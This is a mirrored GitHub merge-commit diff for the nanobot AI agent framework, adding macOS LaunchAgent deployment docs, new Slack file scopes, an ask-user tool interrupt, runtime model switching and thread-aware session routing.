mirror of
https://github.com/HKUDS/nanobot.git
synced 2026-05-20 16:42:25 +00:00
Merge origin/main into fix/msteams-prune-stale-refs
Resolve the MSTeams stale-reference cleanup conflict by keeping the PR's locked, atomic sidecar-meta implementation and aligning the merged test expectation locally. Made-with: Cursor
This commit is contained in:
commit
3d75aedcac
@ -87,6 +87,11 @@ ruff check nanobot/
|
||||
ruff format nanobot/
|
||||
```
|
||||
|
||||
## Contribution License
|
||||
|
||||
By submitting a contribution, you confirm that you have the right to submit it
|
||||
and agree that it will be licensed under the project's MIT License.
|
||||
|
||||
## Code Style
|
||||
|
||||
We care about more than passing lint. We want nanobot to stay small, calm, and readable.
|
||||
|
||||
2
LICENSE
2
LICENSE
@ -1,6 +1,6 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2025 nanobot contributors
|
||||
Copyright (c) 2025-present Xubin Ren and the nanobot contributors
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
|
||||
@ -282,6 +282,10 @@ PRs welcome! The codebase is intentionally small and readable. 🤗
|
||||
- **More integrations** — Calendar and more
|
||||
- **Self-improvement** — Learn from feedback and mistakes
|
||||
|
||||
## Contact
|
||||
|
||||
This project was started by [Xubin Ren](https://github.com/re-bin) as a personal open-source project and continues to be maintained in an individual capacity using personal resources, with contributions from the open-source community. Feel free to contact [xubinrencs@gmail.com](mailto:xubinrencs@gmail.com) for questions, ideas, or collaboration.
|
||||
|
||||
### Contributors
|
||||
|
||||
<a href="https://github.com/HKUDS/nanobot/graphs/contributors">
|
||||
|
||||
@ -18,7 +18,7 @@ Start here for setup, everyday usage, and deployment.
|
||||
| CLI reference | [`cli-reference.md`](./cli-reference.md) | Core CLI commands and common entrypoints |
|
||||
| In-chat commands | [`chat-commands.md`](./chat-commands.md) | Slash commands and periodic task behavior |
|
||||
| OpenAI-compatible API | [`openai-api.md`](./openai-api.md) | Local API endpoints, request format, and file uploads |
|
||||
| Deployment | [`deployment.md`](./deployment.md) | Docker and Linux service setup |
|
||||
| Deployment | [`deployment.md`](./deployment.md) | Docker, Linux service, and macOS LaunchAgent setup |
|
||||
|
||||
## Advanced Docs
|
||||
|
||||
|
||||
@ -434,11 +434,13 @@ Uses **Socket Mode** — no public URL required.
|
||||
|
||||
**2. Configure the app**
|
||||
- **Socket Mode**: Toggle ON → Generate an **App-Level Token** with `connections:write` scope → copy it (`xapp-...`)
|
||||
- **OAuth & Permissions**: Add bot scopes: `chat:write`, `reactions:write`, `app_mentions:read`
|
||||
- **OAuth & Permissions**: Add bot scopes: `chat:write`, `reactions:write`, `app_mentions:read`, `files:read`, `files:write`, `channels:history`, `groups:history`, `im:history`, `mpim:history`
|
||||
- **Event Subscriptions**: Toggle ON → Subscribe to bot events: `message.im`, `message.channels`, `app_mention` → Save Changes
|
||||
- **App Home**: Scroll to **Show Tabs** → Enable **Messages Tab** → Check **"Allow users to send Slash commands and messages from the messages tab"**
|
||||
- **Install App**: Click **Install to Workspace** → Authorize → copy the **Bot Token** (`xoxb-...`)
|
||||
|
||||
> `files:read` is required to read files users send to nanobot. `files:write` is required for nanobot to send images, videos, and other file uploads. If you add either scope later, reinstall the Slack app to the workspace and restart nanobot so it uses the updated bot token.
|
||||
|
||||
**3. Configure nanobot**
|
||||
|
||||
```json
|
||||
|
||||
@ -92,3 +92,75 @@ If you edit the `.service` file itself, run `systemctl --user daemon-reload` bef
|
||||
> ```bash
|
||||
> loginctl enable-linger $USER
|
||||
> ```
|
||||
|
||||
## macOS LaunchAgent
|
||||
|
||||
Use a LaunchAgent when you want `nanobot gateway` to stay online after you log in, without keeping a terminal open.
|
||||
|
||||
**1. Get the absolute `nanobot` path:**
|
||||
|
||||
```bash
|
||||
which nanobot # e.g. /Users/youruser/.local/bin/nanobot
|
||||
```
|
||||
|
||||
Use that exact path in the plist. It keeps the Python environment from your install method.
|
||||
|
||||
**2. Create `~/Library/LaunchAgents/ai.nanobot.gateway.plist`:**
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>Label</key>
|
||||
<string>ai.nanobot.gateway</string>
|
||||
|
||||
<key>ProgramArguments</key>
|
||||
<array>
|
||||
<string>/Users/youruser/.local/bin/nanobot</string>
|
||||
<string>gateway</string>
|
||||
<string>--workspace</string>
|
||||
<string>/Users/youruser/.nanobot/workspace</string>
|
||||
</array>
|
||||
|
||||
<key>WorkingDirectory</key>
|
||||
<string>/Users/youruser/.nanobot/workspace</string>
|
||||
|
||||
<key>RunAtLoad</key>
|
||||
<true/>
|
||||
|
||||
<key>KeepAlive</key>
|
||||
<dict>
|
||||
<key>SuccessfulExit</key>
|
||||
<false/>
|
||||
</dict>
|
||||
|
||||
<key>StandardOutPath</key>
|
||||
<string>/Users/youruser/.nanobot/logs/gateway.log</string>
|
||||
|
||||
<key>StandardErrorPath</key>
|
||||
<string>/Users/youruser/.nanobot/logs/gateway.error.log</string>
|
||||
</dict>
|
||||
</plist>
|
||||
```
|
||||
|
||||
**3. Load and start it:**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/Library/LaunchAgents ~/.nanobot/logs
|
||||
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/ai.nanobot.gateway.plist
|
||||
launchctl enable gui/$(id -u)/ai.nanobot.gateway
|
||||
launchctl kickstart -k gui/$(id -u)/ai.nanobot.gateway
|
||||
```
|
||||
|
||||
**Common operations:**
|
||||
|
||||
```bash
|
||||
launchctl list | grep ai.nanobot.gateway
|
||||
launchctl kickstart -k gui/$(id -u)/ai.nanobot.gateway # restart
|
||||
launchctl bootout gui/$(id -u) ~/Library/LaunchAgents/ai.nanobot.gateway.plist
|
||||
```
|
||||
|
||||
After editing the plist, run `launchctl bootout ...` and `launchctl bootstrap ...` again.
|
||||
|
||||
> **Note:** if startup fails with "address already in use", stop the manually started `nanobot gateway` process first.
|
||||
|
||||
@ -20,14 +20,21 @@ from nanobot.agent.memory import Consolidator, Dream
|
||||
from nanobot.agent.runner import _MAX_INJECTIONS_PER_TURN, AgentRunner, AgentRunSpec
|
||||
from nanobot.agent.skills import BUILTIN_SKILLS_DIR
|
||||
from nanobot.agent.subagent import SubagentManager
|
||||
from nanobot.agent.tools.ask import (
|
||||
AskUserTool,
|
||||
ask_user_options_from_messages,
|
||||
ask_user_outbound,
|
||||
ask_user_tool_result_messages,
|
||||
pending_ask_user_id,
|
||||
)
|
||||
from nanobot.agent.tools.cron import CronTool
|
||||
from nanobot.agent.tools.filesystem import EditFileTool, ListDirTool, ReadFileTool, WriteFileTool
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.agent.tools.notebook import NotebookEditTool
|
||||
from nanobot.agent.tools.registry import ToolRegistry
|
||||
from nanobot.agent.tools.search import GlobTool, GrepTool
|
||||
from nanobot.agent.tools.shell import ExecTool
|
||||
from nanobot.agent.tools.self import MyTool
|
||||
from nanobot.agent.tools.shell import ExecTool
|
||||
from nanobot.agent.tools.spawn import SpawnTool
|
||||
from nanobot.agent.tools.web import WebFetchTool, WebSearchTool
|
||||
from nanobot.bus.events import InboundMessage, OutboundMessage
|
||||
@ -35,6 +42,7 @@ from nanobot.bus.queue import MessageBus
|
||||
from nanobot.command import CommandContext, CommandRouter, register_builtin_commands
|
||||
from nanobot.config.schema import AgentDefaults
|
||||
from nanobot.providers.base import LLMProvider
|
||||
from nanobot.providers.factory import ProviderSnapshot
|
||||
from nanobot.session.manager import Session, SessionManager
|
||||
from nanobot.utils.document import extract_documents
|
||||
from nanobot.utils.helpers import image_placeholder_text
|
||||
@ -68,6 +76,8 @@ class _LoopHook(AgentHook):
|
||||
channel: str = "cli",
|
||||
chat_id: str = "direct",
|
||||
message_id: str | None = None,
|
||||
metadata: dict[str, Any] | None = None,
|
||||
session_key: str | None = None,
|
||||
) -> None:
|
||||
super().__init__(reraise=True)
|
||||
self._loop = agent_loop
|
||||
@ -77,6 +87,8 @@ class _LoopHook(AgentHook):
|
||||
self._channel = channel
|
||||
self._chat_id = chat_id
|
||||
self._message_id = message_id
|
||||
self._metadata = metadata or {}
|
||||
self._session_key = session_key
|
||||
self._stream_buf = ""
|
||||
|
||||
def wants_streaming(self) -> bool:
|
||||
@ -119,7 +131,13 @@ class _LoopHook(AgentHook):
|
||||
for tc in context.tool_calls:
|
||||
args_str = json.dumps(tc.arguments, ensure_ascii=False)
|
||||
logger.info("Tool call: {}({})", tc.name, args_str[:200])
|
||||
self._loop._set_tool_context(self._channel, self._chat_id, self._message_id)
|
||||
self._loop._set_tool_context(
|
||||
self._channel,
|
||||
self._chat_id,
|
||||
self._message_id,
|
||||
self._metadata,
|
||||
session_key=self._session_key,
|
||||
)
|
||||
|
||||
async def after_iteration(self, context: AgentHookContext) -> None:
|
||||
if (
|
||||
@ -183,10 +201,13 @@ class AgentLoop:
|
||||
channels_config: ChannelsConfig | None = None,
|
||||
timezone: str | None = None,
|
||||
session_ttl_minutes: int = 0,
|
||||
consolidation_ratio: float = 0.5,
|
||||
hooks: list[AgentHook] | None = None,
|
||||
unified_session: bool = False,
|
||||
disabled_skills: list[str] | None = None,
|
||||
tools_config: ToolsConfig | None = None,
|
||||
provider_snapshot_loader: Callable[[], ProviderSnapshot] | None = None,
|
||||
provider_signature: tuple[object, ...] | None = None,
|
||||
):
|
||||
from nanobot.config.schema import ExecToolConfig, ToolsConfig, WebToolsConfig
|
||||
|
||||
@ -195,6 +216,8 @@ class AgentLoop:
|
||||
self.bus = bus
|
||||
self.channels_config = channels_config
|
||||
self.provider = provider
|
||||
self._provider_snapshot_loader = provider_snapshot_loader
|
||||
self._provider_signature = provider_signature
|
||||
self.workspace = workspace
|
||||
self.model = model or provider.get_default_model()
|
||||
self.max_iterations = (
|
||||
@ -262,6 +285,7 @@ class AgentLoop:
|
||||
build_messages=self.context.build_messages,
|
||||
get_tool_definitions=self.tools.get_definitions,
|
||||
max_completion_tokens=provider.generation.max_tokens,
|
||||
consolidation_ratio=consolidation_ratio,
|
||||
)
|
||||
self.auto_compact = AutoCompact(
|
||||
sessions=self.sessions,
|
||||
@ -281,12 +305,43 @@ class AgentLoop:
|
||||
self.commands = CommandRouter()
|
||||
register_builtin_commands(self.commands)
|
||||
|
||||
def _apply_provider_snapshot(self, snapshot: ProviderSnapshot) -> None:
|
||||
"""Swap model/provider for future turns without disturbing an active one."""
|
||||
provider = snapshot.provider
|
||||
model = snapshot.model
|
||||
context_window_tokens = snapshot.context_window_tokens
|
||||
if self.provider is provider and self.model == model:
|
||||
return
|
||||
old_model = self.model
|
||||
self.provider = provider
|
||||
self.model = model
|
||||
self.context_window_tokens = context_window_tokens
|
||||
self.runner.provider = provider
|
||||
self.subagents.set_provider(provider, model)
|
||||
self.consolidator.set_provider(provider, model, context_window_tokens)
|
||||
self.dream.set_provider(provider, model)
|
||||
self._provider_signature = snapshot.signature
|
||||
logger.info("Runtime model switched for next turn: {} -> {}", old_model, model)
|
||||
|
||||
def _refresh_provider_snapshot(self) -> None:
|
||||
if self._provider_snapshot_loader is None:
|
||||
return
|
||||
try:
|
||||
snapshot = self._provider_snapshot_loader()
|
||||
except Exception:
|
||||
logger.exception("Failed to refresh provider config")
|
||||
return
|
||||
if snapshot.signature == self._provider_signature:
|
||||
return
|
||||
self._apply_provider_snapshot(snapshot)
|
||||
|
||||
def _register_default_tools(self) -> None:
|
||||
"""Register the default set of tools."""
|
||||
allowed_dir = (
|
||||
self.workspace if (self.restrict_to_workspace or self.exec_config.sandbox) else None
|
||||
)
|
||||
extra_read = [BUILTIN_SKILLS_DIR] if allowed_dir else None
|
||||
self.tools.register(AskUserTool())
|
||||
self.tools.register(
|
||||
ReadFileTool(
|
||||
workspace=self.workspace, allowed_dir=allowed_dir, extra_allowed_dirs=extra_read
|
||||
@ -313,7 +368,7 @@ class AgentLoop:
|
||||
WebSearchTool(config=self.web_config.search, proxy=self.web_config.proxy)
|
||||
)
|
||||
self.tools.register(WebFetchTool(proxy=self.web_config.proxy))
|
||||
self.tools.register(MessageTool(send_callback=self.bus.publish_outbound))
|
||||
self.tools.register(MessageTool(send_callback=self.bus.publish_outbound, workspace=self.workspace))
|
||||
self.tools.register(SpawnTool(manager=self.subagents))
|
||||
if self.cron_service:
|
||||
self.tools.register(
|
||||
@ -342,18 +397,33 @@ class AgentLoop:
|
||||
finally:
|
||||
self._mcp_connecting = False
|
||||
|
||||
def _set_tool_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
|
||||
def _set_tool_context(
|
||||
self, channel: str, chat_id: str,
|
||||
message_id: str | None = None, metadata: dict | None = None,
|
||||
session_key: str | None = None,
|
||||
) -> None:
|
||||
"""Update context for all tools that need routing info."""
|
||||
# Compute the effective session key (accounts for unified sessions)
|
||||
# so that subagent results route to the correct pending queue.
|
||||
effective_key = UNIFIED_SESSION_KEY if self._unified_session else f"{channel}:{chat_id}"
|
||||
# When the caller threads a thread-scoped session_key (e.g. slack with
|
||||
# reply_in_thread: true), honor it so spawn announces route back to
|
||||
# the originating thread session. Falls back to unified mode or
|
||||
# channel:chat_id for callers that don't have a thread-scoped key.
|
||||
if session_key is not None:
|
||||
effective_key = session_key
|
||||
elif self._unified_session:
|
||||
effective_key = UNIFIED_SESSION_KEY
|
||||
else:
|
||||
effective_key = f"{channel}:{chat_id}"
|
||||
for name in ("message", "spawn", "cron", "my"):
|
||||
if tool := self.tools.get(name):
|
||||
if hasattr(tool, "set_context"):
|
||||
if name == "spawn":
|
||||
tool.set_context(channel, chat_id, effective_key=effective_key)
|
||||
elif name == "cron":
|
||||
tool.set_context(channel, chat_id, metadata=metadata, session_key=session_key)
|
||||
elif name == "message":
|
||||
tool.set_context(channel, chat_id, message_id, metadata=metadata)
|
||||
else:
|
||||
tool.set_context(channel, chat_id, *([message_id] if name == "message" else []))
|
||||
tool.set_context(channel, chat_id)
|
||||
|
||||
@staticmethod
|
||||
def _strip_think(text: str | None) -> str | None:
|
||||
@ -419,6 +489,8 @@ class AgentLoop:
|
||||
channel: str = "cli",
|
||||
chat_id: str = "direct",
|
||||
message_id: str | None = None,
|
||||
metadata: dict[str, Any] | None = None,
|
||||
session_key: str | None = None,
|
||||
pending_queue: asyncio.Queue | None = None,
|
||||
) -> tuple[str | None, list[str], list[dict], str, bool]:
|
||||
"""Run the agent iteration loop.
|
||||
@ -438,6 +510,8 @@ class AgentLoop:
|
||||
channel=channel,
|
||||
chat_id=chat_id,
|
||||
message_id=message_id,
|
||||
metadata=metadata,
|
||||
session_key=session_key,
|
||||
)
|
||||
hook: AgentHook = (
|
||||
CompositeHook([loop_hook] + self._extra_hooks) if self._extra_hooks else loop_hook
|
||||
@ -758,13 +832,17 @@ class AgentLoop:
|
||||
pending_queue: asyncio.Queue | None = None,
|
||||
) -> OutboundMessage | None:
|
||||
"""Process a single inbound message and return the response."""
|
||||
self._refresh_provider_snapshot()
|
||||
# System messages: parse origin from chat_id ("channel:chat_id")
|
||||
if msg.channel == "system":
|
||||
channel, chat_id = (
|
||||
msg.chat_id.split(":", 1) if ":" in msg.chat_id else ("cli", msg.chat_id)
|
||||
)
|
||||
logger.info("Processing system message from {}", msg.sender_id)
|
||||
key = f"{channel}:{chat_id}"
|
||||
# Honor session_key_override so subagent announces from threaded
|
||||
# callers route to the originating thread session, not the
|
||||
# channel-level session derived from chat_id.
|
||||
key = msg.session_key_override or f"{channel}:{chat_id}"
|
||||
session = self.sessions.get_or_create(key)
|
||||
if self._restore_runtime_checkpoint(session):
|
||||
self.sessions.save(session)
|
||||
@ -785,8 +863,11 @@ class AgentLoop:
|
||||
is_subagent = msg.sender_id == "subagent"
|
||||
if is_subagent and self._persist_subagent_followup(session, msg):
|
||||
self.sessions.save(session)
|
||||
self._set_tool_context(channel, chat_id, msg.metadata.get("message_id"))
|
||||
history = session.get_history(max_messages=0)
|
||||
self._set_tool_context(
|
||||
channel, chat_id, msg.metadata.get("message_id"),
|
||||
msg.metadata, session_key=key,
|
||||
)
|
||||
history = session.get_history(max_messages=0, include_timestamps=True)
|
||||
current_role = "assistant" if is_subagent else "user"
|
||||
|
||||
# Subagent content is already in `history` above; passing it again
|
||||
@ -799,19 +880,37 @@ class AgentLoop:
|
||||
session_summary=pending,
|
||||
current_role=current_role,
|
||||
)
|
||||
final_content, _, all_msgs, _, _ = await self._run_agent_loop(
|
||||
final_content, _, all_msgs, stop_reason, _ = await self._run_agent_loop(
|
||||
messages, session=session, channel=channel, chat_id=chat_id,
|
||||
message_id=msg.metadata.get("message_id"),
|
||||
metadata=msg.metadata,
|
||||
session_key=key,
|
||||
pending_queue=pending_queue,
|
||||
)
|
||||
self._save_turn(session, all_msgs, 1 + len(history))
|
||||
self._clear_runtime_checkpoint(session)
|
||||
self.sessions.save(session)
|
||||
self._schedule_background(self.consolidator.maybe_consolidate_by_tokens(session))
|
||||
options = ask_user_options_from_messages(all_msgs) if stop_reason == "ask_user" else []
|
||||
content, buttons = ask_user_outbound(
|
||||
final_content or "Background task completed.",
|
||||
options,
|
||||
channel,
|
||||
)
|
||||
# Reconstruct channel-specific metadata from session.key so the
|
||||
# outbound reply lands in the originating thread (not the channel
|
||||
# top-level). The announce InboundMessage carries only
|
||||
# injected_event metadata; we recover thread_ts from the session
|
||||
# key, which slack writes as "slack:<chat_id>:<thread_ts>".
|
||||
outbound_metadata: dict[str, Any] = {}
|
||||
if channel == "slack" and key.startswith("slack:") and key.count(":") >= 2:
|
||||
outbound_metadata["slack"] = {"thread_ts": key.split(":", 2)[2]}
|
||||
return OutboundMessage(
|
||||
channel=channel,
|
||||
chat_id=chat_id,
|
||||
content=final_content or "Background task completed.",
|
||||
content=content,
|
||||
buttons=buttons,
|
||||
metadata=outbound_metadata,
|
||||
)
|
||||
|
||||
# Extract document text from media at the processing boundary so all
|
||||
@ -843,21 +942,33 @@ class AgentLoop:
|
||||
session_summary=pending,
|
||||
)
|
||||
|
||||
self._set_tool_context(msg.channel, msg.chat_id, msg.metadata.get("message_id"))
|
||||
self._set_tool_context(
|
||||
msg.channel, msg.chat_id, msg.metadata.get("message_id"),
|
||||
msg.metadata, session_key=key,
|
||||
)
|
||||
if message_tool := self.tools.get("message"):
|
||||
if isinstance(message_tool, MessageTool):
|
||||
message_tool.start_turn()
|
||||
|
||||
history = session.get_history(max_messages=0)
|
||||
history = session.get_history(max_messages=0, include_timestamps=True)
|
||||
|
||||
initial_messages = self.context.build_messages(
|
||||
history=history,
|
||||
current_message=msg.content,
|
||||
session_summary=pending,
|
||||
media=msg.media if msg.media else None,
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
)
|
||||
pending_ask_id = pending_ask_user_id(history)
|
||||
if pending_ask_id:
|
||||
initial_messages = ask_user_tool_result_messages(
|
||||
self.context.build_system_prompt(channel=msg.channel),
|
||||
history,
|
||||
pending_ask_id,
|
||||
msg.content,
|
||||
)
|
||||
else:
|
||||
initial_messages = self.context.build_messages(
|
||||
history=history,
|
||||
current_message=msg.content,
|
||||
session_summary=pending,
|
||||
media=msg.media if msg.media else None,
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
)
|
||||
|
||||
async def _bus_progress(
|
||||
content: str,
|
||||
@ -898,7 +1009,7 @@ class AgentLoop:
|
||||
user_persisted_early = False
|
||||
media_paths = [p for p in (msg.media or []) if isinstance(p, str) and p]
|
||||
has_text = isinstance(msg.content, str) and msg.content.strip()
|
||||
if has_text or media_paths:
|
||||
if not pending_ask_id and (has_text or media_paths):
|
||||
extra: dict[str, Any] = {"media": list(media_paths)} if media_paths else {}
|
||||
text = msg.content if isinstance(msg.content, str) else ""
|
||||
session.add_message("user", text, **extra)
|
||||
@ -916,6 +1027,8 @@ class AgentLoop:
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
message_id=msg.metadata.get("message_id"),
|
||||
metadata=msg.metadata,
|
||||
session_key=key,
|
||||
pending_queue=pending_queue,
|
||||
)
|
||||
|
||||
@ -944,13 +1057,19 @@ class AgentLoop:
|
||||
logger.info("Response to {}:{}: {}", msg.channel, msg.sender_id, preview)
|
||||
|
||||
meta = dict(msg.metadata or {})
|
||||
if on_stream is not None and stop_reason != "error":
|
||||
final_content, buttons = ask_user_outbound(
|
||||
final_content,
|
||||
ask_user_options_from_messages(all_msgs) if stop_reason == "ask_user" else [],
|
||||
msg.channel,
|
||||
)
|
||||
if on_stream is not None and stop_reason not in {"ask_user", "error"}:
|
||||
meta["_streamed"] = True
|
||||
return OutboundMessage(
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
content=final_content,
|
||||
metadata=meta,
|
||||
buttons=buttons,
|
||||
)
|
||||
|
||||
def _sanitize_persisted_blocks(
|
||||
|
||||
@ -435,6 +435,7 @@ class Consolidator:
|
||||
build_messages: Callable[..., list[dict[str, Any]]],
|
||||
get_tool_definitions: Callable[[], list[dict[str, Any]]],
|
||||
max_completion_tokens: int = 4096,
|
||||
consolidation_ratio: float = 0.5,
|
||||
):
|
||||
self.store = store
|
||||
self.provider = provider
|
||||
@ -442,12 +443,24 @@ class Consolidator:
|
||||
self.sessions = sessions
|
||||
self.context_window_tokens = context_window_tokens
|
||||
self.max_completion_tokens = max_completion_tokens
|
||||
self.consolidation_ratio = consolidation_ratio
|
||||
self._build_messages = build_messages
|
||||
self._get_tool_definitions = get_tool_definitions
|
||||
self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = (
|
||||
weakref.WeakValueDictionary()
|
||||
)
|
||||
|
||||
def set_provider(
|
||||
self,
|
||||
provider: LLMProvider,
|
||||
model: str,
|
||||
context_window_tokens: int,
|
||||
) -> None:
|
||||
self.provider = provider
|
||||
self.model = model
|
||||
self.context_window_tokens = context_window_tokens
|
||||
self.max_completion_tokens = provider.generation.max_tokens
|
||||
|
||||
def get_lock(self, session_key: str) -> asyncio.Lock:
|
||||
"""Return the shared consolidation lock for one session."""
|
||||
return self._locks.setdefault(session_key, asyncio.Lock())
|
||||
@ -481,7 +494,7 @@ class Consolidator:
|
||||
session_summary: str | None = None,
|
||||
) -> tuple[int, str]:
|
||||
"""Estimate current prompt size for the normal session history view."""
|
||||
history = session.get_history(max_messages=0)
|
||||
history = session.get_history(max_messages=0, include_timestamps=True)
|
||||
channel, chat_id = (session.key.split(":", 1) if ":" in session.key else (None, None))
|
||||
probe_messages = self._build_messages(
|
||||
history=history,
|
||||
@ -568,7 +581,7 @@ class Consolidator:
|
||||
lock = self.get_lock(session.key)
|
||||
async with lock:
|
||||
budget = self._input_token_budget
|
||||
target = budget // 2
|
||||
target = int(budget * self.consolidation_ratio)
|
||||
try:
|
||||
estimated, source = self.estimate_session_prompt_tokens(
|
||||
session,
|
||||
@ -708,6 +721,11 @@ class Dream:
|
||||
self._runner = AgentRunner(provider)
|
||||
self._tools = self._build_tools()
|
||||
|
||||
def set_provider(self, provider: LLMProvider, model: str) -> None:
|
||||
self.provider = provider
|
||||
self.model = model
|
||||
self._runner.provider = provider
|
||||
|
||||
# -- tool registry -------------------------------------------------------
|
||||
|
||||
def _build_tools(self) -> ToolRegistry:
|
||||
|
||||
@ -3,16 +3,16 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from dataclasses import dataclass, field
|
||||
import inspect
|
||||
import os
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
from loguru import logger
|
||||
|
||||
from nanobot.agent.hook import AgentHook, AgentHookContext
|
||||
from nanobot.utils.prompt_templates import render_template
|
||||
from nanobot.agent.tools.ask import AskUserInterrupt
|
||||
from nanobot.agent.tools.registry import ToolRegistry
|
||||
from nanobot.providers.base import LLMProvider, LLMResponse, ToolCallRequest
|
||||
from nanobot.utils.helpers import (
|
||||
@ -23,6 +23,7 @@ from nanobot.utils.helpers import (
|
||||
maybe_persist_tool_result,
|
||||
truncate_text,
|
||||
)
|
||||
from nanobot.utils.prompt_templates import render_template
|
||||
from nanobot.utils.runtime import (
|
||||
EMPTY_FINAL_RESPONSE_MESSAGE,
|
||||
build_finalization_retry_message,
|
||||
@ -277,17 +278,22 @@ class AgentRunner:
|
||||
self._accumulate_usage(usage, raw_usage)
|
||||
|
||||
if response.should_execute_tools:
|
||||
tool_calls = list(response.tool_calls)
|
||||
ask_index = next((i for i, tc in enumerate(tool_calls) if tc.name == "ask_user"), None)
|
||||
if ask_index is not None:
|
||||
tool_calls = tool_calls[: ask_index + 1]
|
||||
context.tool_calls = list(tool_calls)
|
||||
if hook.wants_streaming():
|
||||
await hook.on_stream_end(context, resuming=True)
|
||||
|
||||
assistant_message = build_assistant_message(
|
||||
response.content or "",
|
||||
tool_calls=[tc.to_openai_tool_call() for tc in response.tool_calls],
|
||||
tool_calls=[tc.to_openai_tool_call() for tc in tool_calls],
|
||||
reasoning_content=response.reasoning_content,
|
||||
thinking_blocks=response.thinking_blocks,
|
||||
)
|
||||
messages.append(assistant_message)
|
||||
tools_used.extend(tc.name for tc in response.tool_calls)
|
||||
tools_used.extend(tc.name for tc in tool_calls)
|
||||
await self._emit_checkpoint(
|
||||
spec,
|
||||
{
|
||||
@ -296,7 +302,7 @@ class AgentRunner:
|
||||
"model": spec.model,
|
||||
"assistant_message": assistant_message,
|
||||
"completed_tool_results": [],
|
||||
"pending_tool_calls": [tc.to_openai_tool_call() for tc in response.tool_calls],
|
||||
"pending_tool_calls": [tc.to_openai_tool_call() for tc in tool_calls],
|
||||
},
|
||||
)
|
||||
|
||||
@ -304,14 +310,16 @@ class AgentRunner:
|
||||
|
||||
results, new_events, fatal_error = await self._execute_tools(
|
||||
spec,
|
||||
response.tool_calls,
|
||||
tool_calls,
|
||||
external_lookup_counts,
|
||||
)
|
||||
tool_events.extend(new_events)
|
||||
context.tool_results = list(results)
|
||||
context.tool_events = list(new_events)
|
||||
completed_tool_results: list[dict[str, Any]] = []
|
||||
for tool_call, result in zip(response.tool_calls, results):
|
||||
for tool_call, result in zip(tool_calls, results):
|
||||
if isinstance(fatal_error, AskUserInterrupt) and tool_call.name == "ask_user":
|
||||
continue
|
||||
tool_message = {
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call.id,
|
||||
@ -326,6 +334,15 @@ class AgentRunner:
|
||||
messages.append(tool_message)
|
||||
completed_tool_results.append(tool_message)
|
||||
if fatal_error is not None:
|
||||
if isinstance(fatal_error, AskUserInterrupt):
|
||||
final_content = fatal_error.question
|
||||
stop_reason = "ask_user"
|
||||
context.final_content = final_content
|
||||
context.stop_reason = stop_reason
|
||||
if hook.wants_streaming():
|
||||
await hook.on_stream_end(context, resuming=False)
|
||||
await hook.after_iteration(context)
|
||||
break
|
||||
error = f"Error: {type(fatal_error).__name__}: {fatal_error}"
|
||||
final_content = error
|
||||
stop_reason = "tool_error"
|
||||
@ -656,13 +673,21 @@ class AgentRunner:
|
||||
tool_results: list[tuple[Any, dict[str, str], BaseException | None]] = []
|
||||
for batch in batches:
|
||||
if spec.concurrent_tools and len(batch) > 1:
|
||||
tool_results.extend(await asyncio.gather(*(
|
||||
batch_results = await asyncio.gather(*(
|
||||
self._run_tool(spec, tool_call, external_lookup_counts)
|
||||
for tool_call in batch
|
||||
)))
|
||||
))
|
||||
tool_results.extend(batch_results)
|
||||
else:
|
||||
batch_results = []
|
||||
for tool_call in batch:
|
||||
tool_results.append(await self._run_tool(spec, tool_call, external_lookup_counts))
|
||||
result = await self._run_tool(spec, tool_call, external_lookup_counts)
|
||||
tool_results.append(result)
|
||||
batch_results.append(result)
|
||||
if isinstance(result[2], AskUserInterrupt):
|
||||
break
|
||||
if any(isinstance(error, AskUserInterrupt) for _, _, error in batch_results):
|
||||
break
|
||||
|
||||
results: list[Any] = []
|
||||
events: list[dict[str, str]] = []
|
||||
@ -680,7 +705,7 @@ class AgentRunner:
|
||||
tool_call: ToolCallRequest,
|
||||
external_lookup_counts: dict[str, int],
|
||||
) -> tuple[Any, dict[str, str], BaseException | None]:
|
||||
_HINT = "\n\n[Analyze the error above and try a different approach.]"
|
||||
hint = "\n\n[Analyze the error above and try a different approach.]"
|
||||
lookup_error = repeated_external_lookup_error(
|
||||
tool_call.name,
|
||||
tool_call.arguments,
|
||||
@ -693,8 +718,8 @@ class AgentRunner:
|
||||
"detail": "repeated external lookup blocked",
|
||||
}
|
||||
if spec.fail_on_tool_error:
|
||||
return lookup_error + _HINT, event, RuntimeError(lookup_error)
|
||||
return lookup_error + _HINT, event, None
|
||||
return lookup_error + hint, event, RuntimeError(lookup_error)
|
||||
return lookup_error + hint, event, None
|
||||
prepare_call = getattr(spec.tools, "prepare_call", None)
|
||||
tool, params, prep_error = None, tool_call.arguments, None
|
||||
if callable(prepare_call):
|
||||
@ -710,7 +735,7 @@ class AgentRunner:
|
||||
"status": "error",
|
||||
"detail": prep_error.split(": ", 1)[-1][:120],
|
||||
}
|
||||
return prep_error + _HINT, event, RuntimeError(prep_error) if spec.fail_on_tool_error else None
|
||||
return prep_error + hint, event, RuntimeError(prep_error) if spec.fail_on_tool_error else None
|
||||
try:
|
||||
if tool is not None:
|
||||
result = await tool.execute(**params)
|
||||
@ -724,6 +749,9 @@ class AgentRunner:
|
||||
"status": "error",
|
||||
"detail": str(exc),
|
||||
}
|
||||
if isinstance(exc, AskUserInterrupt):
|
||||
event["status"] = "waiting"
|
||||
return "", event, exc
|
||||
if spec.fail_on_tool_error:
|
||||
return f"Error: {type(exc).__name__}: {exc}", event, exc
|
||||
return f"Error: {type(exc).__name__}: {exc}", event, None
|
||||
